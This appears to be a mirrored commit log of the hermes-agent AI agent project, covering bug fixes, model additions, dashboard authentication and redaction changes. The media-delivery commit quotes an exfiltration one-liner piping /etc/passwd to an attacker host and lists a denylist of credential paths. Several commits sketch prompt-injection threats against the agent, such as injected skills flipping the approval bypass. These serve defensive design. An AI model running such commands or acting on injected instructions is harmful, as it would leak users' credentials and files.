hermes-agent

mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-07-14 14:12:44 +00:00

Author	SHA1	Message	Date
Teknium	f3acdd94fe	Merge pull request #30698 from NousResearch/refactor/use-ds-primitives refactor(web): consume DS primitives, remove local component copies	2026-05-28 17:29:28 -07:00
Teknium	78a54d2c00	fix(skills-page): source pills and category sidebar collapsed to All only (#34194 ) Regression from PR #33809 (lazy-fetch refactor). The `sources` and `categoryEntries` useMemo blocks were derived from `allSkillsLocal` but had empty/incomplete deps arrays — so they computed once at mount when the catalog was still `[]`, then never recomputed when the fetch resolved. Symptom: live site shows only the "All 87,639" source button and "All Skills 87,639" category — no per-source pills (ClawHub, skills.sh, LobeHub, etc.) and no category breakdown. Filtering by source/category is unusable. Fix: add `allSkillsLocal` to both deps arrays so they recompute when data arrives. Local build green on en + zh-Hans.	2026-05-28 17:11:40 -07:00
Ben	e7c99651fb	fix(mcp): resolve bare npx/npm/node against /usr/local/bin When the Hermes Docker image runs an stdio MCP server configured with an explicit env.PATH that omits /usr/local/bin (a common pattern when users hand-author PATH for sandboxing), the MCP env-filter passes that narrow PATH straight through to the subprocess. _resolve_stdio_command's fallback for bare 'npx' / 'npm' / 'node' commands only checked $HERMES_HOME/node/bin/ and ~/.local/bin/, so execvp() failed with '[Errno 2] No such file or directory: npx' on every Node-based stdio MCP server (Railway, Anthropic, GitHub Copilot, etc.). The naive workaround — symlink /usr/local/bin/npx into the user's PATH — fails one layer deeper because npx's shebang re-execs /usr/bin/env node and node also lives at /usr/local/bin/node. Fix: add /usr/local/bin/<cmd> as a third candidate in the fallback list. This is the canonical install location for Node on: - Linux from-source builds - the upstream node:bookworm-slim image, which the Hermes Docker image copies node + npm + corepack from since #4977 (the Node 22 LTS refactor that exposed this) - macOS Homebrew on Intel Because the resolver already calls _prepend_path(resolved_env, command_dir) after locating the command, /usr/local/bin gets prepended to the env's PATH automatically, which also fixes the second-layer shebang failure (npx-cli.js can now find node). Scope is intentionally narrow: the fix activates only when the bare command isn't otherwise locatable through the user's PATH. Users who explicitly narrowed PATH for a non-Node MCP server see no change in behavior. Tested: - tests/tools/test_mcp_tool_issue_948.py: new test test_resolve_stdio_command_falls_back_to_usr_local_bin (mirrors the existing hermes-node-bin fallback test) - Full MCP test suite: 254/254 pass across 7 test files - E2E against a freshly-built Docker image: reproduced the original failure mode (env.PATH=/opt/data/bin:/usr/bin:/bin), confirmed the resolver returns /usr/local/bin/npx and prepends /usr/local/bin to PATH; subprocess.run of the resolved command prints '10.9.8' and exits 0 with empty stderr - Negative E2E on the host (where Node is already on PATH via mise): resolver still hits the mise install dir, /usr/local/bin candidate is not consulted, PATH is unchanged	2026-05-29 10:05:42 +10:00
Ben	fb51253620	docker: opt in to dashboard --insecure via env var, never derive from bind host The s6 dashboard run script flipped `--insecure` on whenever `HERMES_DASHBOARD_HOST` was anything other than 127.0.0.1 / localhost. That comment ("the dashboard refuses otherwise") predates the OAuth auth gate: back when it was written, `start_server` would SystemExit on any non-loopback bind, so the run script's `--insecure` was the only way to make in-container deployments work at all. The gate has since been replaced by `should_require_auth(host, allow_public)`, which engages the OAuth flow when a `DashboardAuthProvider` is registered (the bundled `dashboard_auth/nous` provider auto-registers on `HERMES_DASHBOARD_OAUTH_CLIENT_ID`) and fails closed with a specific operator-facing error when none is. The host-derived `--insecure` ran upstream of all that and silently disabled the gate on every container-deployed dashboard. Most visible under the portal's wildcard-subdomain rollout: every Fly machine binds 0.0.0.0 so the edge can reach Flycast, every machine boots with the correct `HERMES_DASHBOARD_OAUTH_CLIENT_ID`, the nous provider registers — and `/api/status` still returns `{"auth_required": false, "auth_providers": ["nous"]}` because the run script disabled the gate before `start_server` ever saw the request. The dashboard SPA was served to anyone, no `/login` redirect, no OAuth challenge. Fix: derive `--insecure` from an explicit opt-in env var, `HERMES_DASHBOARD_INSECURE` (truthy values matching the rest of the s6 boolean envs: 1, true, TRUE, True, yes, YES, Yes). Operators on trusted LANs behind a reverse proxy without the OAuth contract (the existing `docker-compose.windows.yml` use case) opt in explicitly; portal-managed agent deployments leave it unset and let the gate engage. `docker-compose.windows.yml` already passes `--insecure` on the `command:` array directly (line 38), so it doesn't depend on the s6 auto-injection. No compose-file change required. Tests: * `tests/test_docker_home_override_scripts.py` — extends the existing static-text guard with a regression assertion that the legacy host-derived case-statement is gone and the new env-var opt-in is present (locks against accidental revert). * `tests/docker/test_dashboard.py` — adds two Docker-in-Docker tests exercising the actual `/api/status` round-trip: - 0.0.0.0 bind + `HERMES_DASHBOARD_OAUTH_CLIENT_ID` → gate engaged - 0.0.0.0 bind + `HERMES_DASHBOARD_INSECURE=1` → gate disabled Docs: * `website/docs/user-guide/docker.md` + zh-Hans i18n — adds the new env var to the table, replaces the stale prose ("the entrypoint no longer auto-enables insecure mode" — which until this PR was flat-out wrong) with an accurate description of the gate's trigger conditions and the explicit opt-out. shellcheck clean. Python static-text test passes locally. Behavioural test will run against any future image build (CI's Docker harness).	2026-05-29 09:56:40 +10:00
Evo	ef009a987a	docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE from #33583 (#33751 ) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (en) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (zh) * docs(reference): document --no-supervise / HERMES_GATEWAY_NO_SUPERVISE (zh)	2026-05-29 09:44:53 +10:00
BROCCOLO1D	130396c658	ci(docker): avoid gha cache on arm64 PR builds	2026-05-29 09:43:48 +10:00
Austin Pickett	a5c1f925b5	fix(web): stop /api/auth/me 401 from triggering a reload loop In loopback mode the dashboard's identity probe (/api/auth/me) returns 401 by design — AuthWidget swallows it and renders nothing. But the probe routed through fetchJSON, whose loopback 401 handler treats a 401 as a rotated session token and full-page-reloads to pick up a fresh one. That reload is guarded by a one-shot sessionStorage flag which every successful request clears, so with auth/me reliably 401ing and the other dashboard calls (status/config/sessions) reliably succeeding, the guard never sticks and the page reload-loops indefinitely (the "boot flash"). Add an allowUnauthorized option to fetchJSON that skips only the loopback stale-token reload (the 401 still throws so AuthWidget can catch it, and the gated-mode login_url envelope redirect is unaffected), and use it for getAuthMe. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 16:58:42 -04:00
kshitij	11d93096b3	Merge pull request #34097 from kshitijk4poor/salvage/memori-trace-messages feat: expose completed-turn message context to memory providers (salvage #28065)	2026-05-28 13:56:07 -07:00
kshitijk4poor	d464d08a5f	chore: add devwdave to AUTHOR_MAP Maps both commit emails (david@memorilabs.ai, dave@devwdave.com) used on #28065 to the devwdave GitHub account so the contributor audit in scripts/release.py passes.	2026-05-29 02:16:43 +05:30
Dave Heritage	5a95fb2e14	feat: expose completed-turn message context to memory providers Adds an optional `messages` keyword to the `MemoryProvider.sync_turn` contract so external/community memory plugins can receive the OpenAI-style conversation message list for the completed turn — including assistant tool calls and tool result content — not just the final assistant text. Dispatch uses signature inspection (`_provider_sync_accepts_messages`): only providers that declare a `messages` parameter (or `**kwargs`) receive it; all existing in-tree providers keep their legacy text-only signature and are called unchanged. No structured-trace envelope is added to core — providers reconstruct whatever they need from the standard message list. Also documents Memori as a standalone community memory provider. Salvaged from #28065 — rebased onto current main. Co-authored-by: Dave Heritage <david@memorilabs.ai>	2026-05-29 02:16:43 +05:30
Austin Pickett	0acb7f4583	fix(nix): update hermes-web npmDepsHash for @nous-research/ui 0.18.2 The web/package-lock.json changed when bumping @nous-research/ui to 0.18.2, so the fetchNpmDeps fixed-output hash in nix/web.nix was stale. Update it to the hash prefetch-npm-deps computes for the new lockfile. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 16:24:01 -04:00
Austin Pickett	a3cd974ee7	chore(web): bump @nous-research/ui to 0.18.2 Picks up the deferred GPU-tier detection fix (design-language) that stops the synchronous WebGL probe from blocking first paint, which was causing a boot-time flash in the dashboard backdrop. nix/web.nix npmDepsHash is a placeholder here and is corrected in the follow-up commit using the hash reported by the Nix CI job. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 16:20:14 -04:00
Teknium	ea5a6c216b	ci(deploy): allow workflow_dispatch to also trigger Vercel deploy (#34081 ) Today's three skills-index PRs (#33748, #33809, #34025) merged to main but the live Vercel-hosted docs site didn't pick them up — Vercel is fired by the deploy-vercel job, which was gated on release events only. Out-of-band main commits between releases couldn't reach Vercel without cutting a tag. Widen the gate to also include workflow_dispatch so 'gh workflow run deploy-site.yml' can ship pending main changes to Vercel on demand. Release-tag behavior is unchanged.	2026-05-28 13:17:58 -07:00
kshitijk4poor	4df62d239e	docs(hindsight): correct recall_types scope — tool path is also narrowed The original change's description and README claimed the per-call hindsight_recall tool was unaffected by the new observation-only default. That is inaccurate: hindsight_recall reads the same self._recall_types instance attribute as the auto-recall prefetch path, and RECALL_SCHEMA exposes no per-call types argument, so the model cannot override it. Narrowing the default narrows BOTH paths. Corrects the README behavior-change note, the config-table row, and the get_config_schema description to reflect that recall_types applies to both auto-recall and the hindsight_recall tool.	2026-05-28 13:07:20 -07:00
Nicolò Boschi	490b3e76b1	feat(hindsight): default recall_types to observation only Auto-recall used to surface every fact type Hindsight had on the session — `world`, `experience`, and `observation`. That triple-ships the same underlying signal in three different framings: observations are the concrete events the user said/did/asked, while world and experience facts are aggregate summaries Hindsight derives from those exact observations. Including all three burns most of `recall_max_tokens` on rephrasings, crowds out events the model actually needs to see, and produces effective duplicates in the prompt — observations themselves are deduplicated by construction so observation-only recall is denser per token and closer to conversational ground truth. Change ------ - Default `_recall_types = ["observation"]` (was `None`, which delegated to server-side "return everything"). - `initialize()` now treats a missing `recall_types` config the same way; also accepts comma-separated strings for parity with `recall_tags`. - An explicit `recall_types=[]` config falls back to the default rather than disabling the filter (would silently widen recall vs. the new default). - Added to `get_config_schema()` so it's discoverable via `hermes config`. Per-call `hindsight_recall` tool invocations are unaffected — they already only forward `types` when the caller passes the argument. Docs / migration ---------------- plugins/memory/hindsight/README.md grows a "Behavior change" callout explaining the why (no-duplicates, information-efficient) and how to restore the legacy broad recall: "recall_types": "observation,world,experience" # or a JSON list in `~/.hermes/hindsight/config.json`. Tests ----- - `test_default_values` updated for the new default. - New cases: explicit list override, CSV string accepted, empty list falls back to default (not "wider than default").	2026-05-28 13:07:20 -07:00
teknium1	321ce94e25	test: update non-minimax overflow test to match new keep-context behavior The old test asserted that a non-MiniMax provider returning a generic overflow (no provider-reported max) would step down to the 128K probe tier. The salvaged fix from #33673 deliberately removes that step-down because guessed tiers cause configured 1M sessions to silently shrink. Update the test to assert the new contract: keep the configured 200K window and rely on compression instead.	2026-05-28 12:26:53 -07:00
teknium1	c5e496e1c0	chore: map yanghongda@jackyun.com -> yangguangjin in AUTHOR_MAP	2026-05-28 12:26:53 -07:00
yanghd	7a3c38d0b7	fix: stop probe stepdown without provider context limit	2026-05-28 12:26:53 -07:00
kshitijk4poor	5cbc3fbdcc	fix(cli): /yolo in chat must enable session bypass, not just set env var The CLI's in-chat `/yolo` toggle mutated `os.environ["HERMES_YOLO_MODE"]` but had no effect because `tools/approval.py:_YOLO_MODE_FROZEN` captures that env var once at module-import time (a deliberate security floor that keeps prompt-injected skills from flipping the bypass mid-run). By the time the user reaches `/yolo` in a running CLI session, `tools.approval` has already been imported, so the env flip after that is a silent no-op. Result: `/yolo` advertised "⚠ YOLO" in the status bar while every dangerous command still hit the approval prompt or got denied. Only `hermes --yolo` (set before tool imports), `HERMES_YOLO_MODE=1 hermes ...`, and `hermes config set approvals.mode off` actually bypassed. This patches the CLI to match what the gateway and TUI `/yolo` handlers already do, plus mirrors the TUI's session-rename YOLO transfer: * `_toggle_yolo()` now calls `enable_session_yolo(self.session_id)` / `disable_session_yolo(self.session_id)` instead of touching the env var. Matches `gateway/run.py:_handle_yolo_command` and the `tui_gateway/server.py` key=="yolo" branch. * Around each `run_conversation()` call, `run_agent()` now binds `set_current_session_key(self.session_id)` so `tools.approval.is_current_session_yolo_enabled()` resolves against the same key the toggle writes under, and resets it in `finally` so reused threads don't see stale identity. Matches the `tui_gateway/server.py` and `gateway/platforms/api_server.py` binding pattern. * New `_transfer_session_yolo()` helper carries YOLO bypass state across `self.session_id` reassignments — `/branch` forking into a new session id and the auto-compression sync that rotates into a fresh continuation session id. Without this, the same UX failure mode the rest of this fix addresses (silent `/yolo` no-op) would reappear after a single `/branch` or auto-compression event. Mirrors `tui_gateway/server.py` ~line 1297-1305. * New `_is_session_yolo_active()` helper replaces the two `bool(os.getenv("HERMES_YOLO_MODE"))` reads in the status-bar builders, so the badge reflects the actual bypass state. Uses `getattr(self, "session_id", None)` so status-bar test fixtures that bypass `__init__` via `HermesCLI.__new__(HermesCLI)` don't trip `AttributeError` (the builders swallow exceptions silently and lose every field after the failure). Still honors `_YOLO_MODE_FROZEN` so `hermes --yolo` keeps lighting it up. The `_YOLO_MODE_FROZEN` security freeze is preserved — env-var-based opt-in still only works when set before process start, which is the documented contract for `--yolo` / `HERMES_YOLO_MODE`. Closes #33925	2026-05-28 12:10:21 -07:00
teknium1	f30db14ced	fix(kanban): SIGTERM on worker must terminate the process (#28181 ) The single-query signal handler in cli.py raises KeyboardInterrupt on SIGTERM/SIGHUP. For interactive 'hermes chat -q' that unwinds the main thread cleanly. For kanban workers spawned by the dispatcher, the worker process is likely to have a non-daemon thread alive (terminal _wait_for_process, custom plugins, etc.). With KeyboardInterrupt only the main thread unwinds; the non-daemon thread keeps the process alive, the gateway has already restarted, and the dispatcher's _pid_alive check returns True forever — task stuck in 'running' indefinitely. When HERMES_KANBAN_TASK is set (dispatcher-spawned worker), flush logging + stdout/stderr, then os._exit(0) instead of raising KeyboardInterrupt. The kernel reclaims the PID immediately, and the existing zombie-state detection in _pid_alive flips the task to crashed on the next dispatcher tick. detect_crashed_workers then re-spawns it on the following tick — no manual recovery needed. A SIGALRM(2s) deadman is armed before the flush so a pathological blocking-I/O flush can't wedge the worker forever. In practice the reporter measured flush in <1ms; the alarm is a failsafe, never the common path. Interactive (non-kanban) chat -q is unchanged — the env-gated branch only fires for dispatcher-spawned workers. Live verification on this machine: - Without HERMES_KANBAN_TASK + non-daemon thread alive: process hangs alive 4+ seconds after SIGTERM. Dispatcher's _pid_alive returns True → task stuck. - With HERMES_KANBAN_TASK + same non-daemon thread: process exits in 0.10s via os._exit(0). Dispatcher reclaims on next tick. Tests: - tests/hermes_cli/test_signal_handler_kanban_worker.py (3 cases): end-to-end subprocess test with a non-daemon thread, HERMES_KANBAN_TASK env, SIGTERM, dispatcher-style _pid_alive check. Plus a source-level invariant test catching future refactors that drop the env-gated exit. - 452/452 kanban tests pass. Co-authored-by: andrewhosf <andrewho.sf@gmail.com>	2026-05-28 11:59:58 -07:00
Teknium	3a9bc9d88a	fix(model picker): unify /model and `hermes model` lists, add disk cache (#33867 ) * fix(model picker): unify /model and `hermes model` model lists, add disk cache The /model slash picker and `hermes model` were drifting apart. /model read the raw static `OPENROUTER_MODELS` list (31 entries, including 5 that fail at runtime — no tool-call support or absent from live catalog), while `hermes model` ran the same list through the live OpenRouter /v1/models tool-support filter and showed 26 valid entries. Same problem existed for every other authed provider: /model used curated static lists, `hermes model` used live /v1/models. Unifies both surfaces on `provider_model_ids()` and adds a generic disk-cached wrapper so the picker stays snappy. Changes - hermes_cli/models.py: new `cached_provider_model_ids()` — ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries keyed by credential fingerprint (env vars + OAuth file mtimes). Stale-data-beats-no-data on transient failures. Pair with `clear_provider_models_cache(provider=None)`. - hermes_cli/models.py: `provider_model_ids("nous")` now falls back to the docs-hosted manifest (not the in-repo snapshot) when the live Portal /models call fails — preserves the model_catalog regression guarantee while still going through the unified pathway. - hermes_cli/model_switch.py: `list_authenticated_providers` routes sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with curated fallback when the live fetcher comes up empty. - hermes_cli/model_switch.py: `parse_model_flags` extended to a 4-tuple, parses `--refresh`. - cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking; CLI + gateway wire `--refresh` to `clear_provider_models_cache()`. - hermes_cli/main.py: `hermes model --refresh` argparse flag. - hermes_cli/commands.py: `/model` args_hint advertises `--refresh`. - tests/hermes_cli/test_inventory.py: refresh stale comment. Live PTY parity verification - /model → OpenRouter row: `(26 models)` (was 31, with broken entries) - `hermes model` → OpenRouter: 26 models (unchanged) - The 5 dropped entries: `pareto-code` (no tool-call support), `gemini-3-pro-image-preview` (no tool-call support), `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone from OpenRouter's live catalog). Live PTY timing - First /model open, empty cache: 4624 ms (full network round trip across every authed provider) - Second /model open, warm cache: 51 ms (90× faster) - `/model --refresh` clears the disk cache and re-fetches. Cache schema (~/.hermes/provider_models_cache.json, ~3 KB): { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]}, ... } Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway — 5855/5855 pass. * fix(model picker): use blake2b for cache fingerprint to silence CodeQL py/weak-sensitive-data-hashing flagged the sha256 call in _credential_fingerprint() as a high-severity alert because the input includes env var values whose names contain _API_KEY / _TOKEN. The hash is used solely as a cache-bust identity — never reversed, never stored, collisions are harmless (worst case: cache miss → live re-fetch). blake2b serves the same purpose and isn't flagged by this rule. Functional behavior identical: 16-hex-char digest, cache hit/miss logic unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.	2026-05-28 11:33:16 -07:00
Teknium	5f66c36470	fix(redact): pass web URLs through unchanged (#34029 ) * fix(redact): pass web URLs through unchanged Magic-link checkout URLs, OAuth callbacks the agent is meant to follow, and pre-signed share URLs were getting `?token=*` / `?code=` / `?signature=` blanket-redacted by parameter NAME, which breaks any skill that has to round-trip a URL through history (the model's tool call arguments get sanitized before persistence — the live call fires with the real URL, but the next turn sees ``). Joe Rinaldi Johnson hit this with a checkout-acceleration skill that uses magic links in URLs. Drops three call sites from `redact_sensitive_text`: - `_redact_url_query_params` (was redacting `access_token`, `token`, `api_key`, `code`, `signature`, `key`, `auth`, etc.) - `_redact_url_userinfo` (was redacting `https://user:pass@host`) - `_redact_http_request_target_query_params` (was redacting access-log request targets like `"POST /hook?password=... HTTP/1.1"`) The helpers themselves are kept in the module — still importable by anything that wants to opt in explicitly. Still redacted (unchanged): - Vendor-prefix credential shapes (sk-, ghp_, AKIA, gAAAA, etc.) anywhere they appear, including inside URLs — see the `test_known_prefix_inside_url_still_redacted` case. - JWTs (`eyJ...`) - DB connection-string passwords (`postgres://admin:pw@host`) — these are connection strings, not web URLs the agent navigates to. - Authorization headers, ENV assignments, JSON `apiKey`/`token` fields, Telegram bot tokens, private key blocks, Discord mentions, E.164 phone numbers, and form-urlencoded bodies (request bodies, not URLs). Tests: replaces `TestUrlQueryParamRedaction` + `TestUrlUserinfoRedaction` with `TestWebUrlsNotRedacted`, asserting representative URLs (OAuth callback, magic link, S3 pre-signed, websocket, userinfo, access log) pass through unchanged. Adds positive cases proving the prefix and DB connstr nets still fire. 74 redact tests + 10 browser-exfil + 16 PII redaction tests all pass. test(codex_app_server): drop URL-query assertion from stderr-tail redaction test The test bundled (a) sk-live-* credential-prefix redaction with (b) URL query-param redaction. (a) is still in effect via _PREFIX_RE; (b) was the contract we just removed in the parent commit so the 'querysecret12345' assertion stopped holding. Keep the credential-shape assertion, drop the URL-query one. Send-message tool's local _URL_SECRET_QUERY_RE in tools/send_message_tool.py is independent of agent/redact.py and unchanged — its tests (test_top_level_send_failure_redacts_query_token, test_http_error_redacts_access_token_in_exception_text) still pass.	2026-05-28 11:32:39 -07:00
Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
Teknium	7050c052e3	fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025 ) The skills.sh source was returning ~858 unique skills from a hardcoded list of 28 popular keyword searches (each capped at 50 results). The real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from the site's sitemap index. Switch the empty-query path in SkillsShSource.search() to walk the sitemap instead of scraping the homepage's curated featured strip. Falls back to the homepage scrape if the sitemap is unreachable. build_skills_index.crawl_skills_sh() now just calls search("", limit=0) instead of running 28 keyword searches — same result in one HTTP round instead of 28. Also handle a httpx + brotlicffi interaction: the per-skill sitemaps are ~900 KB brotli-compressed and the cffi backend's streaming decode chokes on them. Forcing Accept-Encoding to gzip dodges the bug without requiring a brotli library upgrade. E2E against live skills.sh: 19,932 unique skills walked in 0.7s. Tests: 137 pass (+1 new regression test exercising the sitemap path). Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future regression hard-fails the build.	2026-05-28 11:28:12 -07:00
Austin Pickett	102eb4adc0	fix(nix): update hermes-web npmDepsHash for bumped @nous-research/ui The web/package-lock.json changed when bumping @nous-research/ui to 0.18.0, so the fetchNpmDeps fixed-output hash in nix/web.nix was stale and the nix build failed. Update it to the hash prefetch-npm-deps computes for the new lockfile. Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 14:27:08 -04:00
Teknium	b1d3ead7fb	docs: tweak v0.15.0 release notes (#34037 )	2026-05-28 11:20:52 -07:00
Austin Pickett	c661fefa08	Merge remote-tracking branch 'origin/main' into refactor/use-ds-primitives Co-authored-by: Cursor <cursoragent@cursor.com> # Conflicts: # web/src/components/BottomPickSheet.tsx # web/src/components/SidebarFooter.tsx # web/src/components/ui/card.tsx # web/src/components/ui/confirm-dialog.tsx # web/src/pages/ChatPage.tsx	2026-05-28 14:20:49 -04:00
Teknium	fe5c8ec4ad	fix(dashboard): auto-reload SPA on stale-token 401 in loopback mode (#33861 ) The dashboard's loopback auth uses an ephemeral '_SESSION_TOKEN' that rotates on every server restart (hermes update, hermes gateway restart, etc.). A tab kept open across the restart holds the OLD token in window.__HERMES_SESSION_TOKEN__ from the previous HTML render, so every '/api/*' fetch returns '401 Unauthorized' — surfacing in the UI as 'Failed to load Kanban board: 401: Unauthorized', 'Analytics 401', etc. (#24186, #25275). Before this patch the workaround was to manually clear site data or hard-reload — annoying enough that users reported it as a regression even though the token rotation is by design (security property: stolen tokens can't survive a server restart). The HTML response already sets 'Cache-Control: no-store, no-cache, must-revalidate', so a reload reliably picks up the freshly-injected token. fetchJSON now triggers that reload automatically on the first loopback-mode 401, guarded by a sessionStorage flag so a genuine auth bug (where even the new token fails) falls through to throw on the second attempt instead of reload-looping. The flag is cleared on any 2xx so a subsequent server restart in the same tab gets its own reload cycle. Gated mode is unaffected — that path already redirects to login_url via the structured 401 envelope (Phase 6), and the new code is explicitly skipped when window.__HERMES_AUTH_REQUIRED__ is set. Refs #24186, #25275	2026-05-28 10:53:23 -07:00
Teknium	0c859a1c04	chore: release v0.15.0 (2026.5.28) (#34008 ) * chore: release v0.15.0 (2026.5.28) The Velocity Release. Run_agent.py refactor (16k→3.8k LOC, -76%), kanban grows into a multi-agent platform (104 PRs), cold-start perf wave continues (-240ms / -47% per-turn function calls / -195ms per tool call), session_search rebuilt (4500x faster, no LLM), promptware defense lands, Bitwarden Secrets Manager integration, two new image_gen providers (Krea 2, FAL plugin port), Nous-approved MCP catalog, OpenHands skill, ntfy as 23rd messaging platform, deep xAI integration round. 15 P0 + 65 P1 closures. 747 PRs, 1,302 commits, 321 contributors. * chore(release): bump acp_registry/agent.json to 0.15.0 (sync with pyproject)	2026-05-28 10:45:33 -07:00
kshitij	1a74795735	feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003 ) Anthropic released Claude Opus 4.8 on 2026-05-27, available on OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS: - https://openrouter.ai/anthropic/claude-opus-4.8 - https://openrouter.ai/anthropic/claude-opus-4.8-fast The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast) priced at 2x of the base model — a notable improvement over the 6x premium on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request parameter like Opus 4.6; Anthropic's native fast-mode beta still only covers Opus 4.6. Changes: hermes_cli/models.py - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to the OpenRouter fallback snapshot and the Nous Portal curated list (live catalogs surface them automatically when reachable; the fallback list matters when the manifest fetch fails). - Add claude-opus-4-8 to the Anthropic-native picker list. agent/model_metadata.py - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS with 1M tokens (matches 4.6/4.7). agent/anthropic_adapter.py - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the Opus 4.7 API contract: adaptive thinking only, xhigh effort level supported, sampling parameters (temperature/top_p/top_k) return 400. - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output, same as 4.7). Matches by substring so claude-opus-4-8-fast and date-stamped variants resolve correctly. agent/usage_pricing.py - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50 cache read, $6.25 cache write (same as 4.6/4.7). - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00 cache read, $12.50 cache write. Per OpenRouter, the 2x premium is the only differentiator from regular Opus 4.8. - OpenRouter routes still pull pricing from the live /models API, so no static OpenRouter entry is needed. tests/agent/test_model_metadata.py - Extend the Claude 4.6+ context-length tag list with 4.8/4-8. website/static/api/model-catalog.json - Regenerated via `python scripts/build_model_catalog.py` to pick up the new entries in the OpenRouter and Nous Portal fallback lists. E2E verification (isolated sys.path import against the worktree): - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params all return True for claude-opus-4.8 and claude-opus-4.8-fast. - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays False for 4.8 — fast mode is a separate model ID on OpenRouter, not a parameter Anthropic accepts on the base model. - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations. - resolve_billing_route + _lookup_official_docs_pricing resolve the correct $5/$25 (regular) and $10/$50 (fast) pricing for both dot-notation and dash-notation inputs. - 4.7 and 4.6 regression: behavior unchanged. Unit tests: 305 passed across tests/agent/test_usage_pricing.py, test_model_metadata.py, tests/hermes_cli/test_model_catalog.py, test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.	2026-05-28 10:31:59 -07:00
Ben Heidorn	e8b9369a9d	feat(openrouter): pass session_id in extra_body for sticky routing OpenRouter supports a session_id field in extra_body that pins multi-turn conversations to the same provider endpoint, enabling prompt cache reuse across turns. The session_id was already threaded through to build_extra_body() but never included in the returned dict. Co-Authored-By: Claude Opus 4 (1M context) <noreply@anthropic.com>	2026-05-28 08:52:19 -07:00
